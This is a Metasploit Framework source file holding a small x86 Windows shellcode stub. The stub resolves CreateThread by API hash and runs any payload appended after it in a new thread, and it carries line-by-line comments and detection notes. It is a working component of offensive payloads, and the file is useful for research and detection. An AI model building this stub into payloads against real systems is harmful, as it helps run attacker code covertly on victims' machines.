GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/x86/src/single/createthread.asm
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (14 July 2010)
; Size: 167
; Build: >build.py createthread
;-----------------------------------------------------------------------------;
; Purpose: 32-bit Windows stub that calls kernel32!CreateThread (resolved by
; hash through the included block_api) with 'threadstart' as the start address,
; then returns to whatever invoked the stub. 'threadstart' is the last label in
; this file, so the new thread runs into whatever bytes are assembled after it.
;
; Syntax: NASM (Intel operand order). Calling convention used for the API call:
; stdcall, arguments pushed right to left, with the API hash pushed last for
; block_api.
;
; Register roles:
;   ebp = address of 'delta' (start of the included block_api code)
;   eax = 0, used as the NULL / 0 value for five of the six arguments
;   ebx = run-time address of 'threadstart'
;
; NOTE(detection): the immediate 0x160D6838 is emitted verbatim in the byte
; stream, so it is a stable static indicator for this stub. At run time the
; observable behaviour is a CreateThread call whose start address lies a few
; bytes past the calling code, typically in memory not backed by a module image.
[BITS 32]
[ORG 0]                  ; labels are offsets from 0; run-time addresses are derived from ebp below

  cld                    ; clear the direction flag; presumably required by string ops in block_api.asm (not shown here)
  call start             ; pushes the address of 'delta' as the return address (call/pop get-PC idiom)
delta:
%include "./src/block/block_api.asm"
start:
  pop ebp                ; ebp = address of 'delta', i.e. the entry of the included block ('api_call'), for calling later
  xor eax, eax           ; eax = 0
  push eax               ; lpThreadId = NULL
  push eax               ; dwCreationFlags = 0
  push eax               ; lpParameter = NULL
  lea ebx, [ebp+threadstart-delta] ; ebx = delta's run-time address + assemble-time distance to 'threadstart'
  push ebx               ; lpStartAddress = &threadstart
  push eax               ; dwStackSize = 0
  push eax               ; lpThreadAttributes = NULL
  push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
  call ebp               ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
  ret                    ; back to the stub's caller; the call's result is neither checked nor closed in this file
threadstart:
  ; Entry point of the new thread. Nothing follows this instruction in the
  ; file, so execution continues into the code assembled after this stub.
  pop eax                ; discard the top dword of the new thread's stack; the author describes it as the unused
                         ; thread param, so that the code that follows can just return when done
                         ; NOTE(review): confirm against the thread-entry stack layout which dword this removes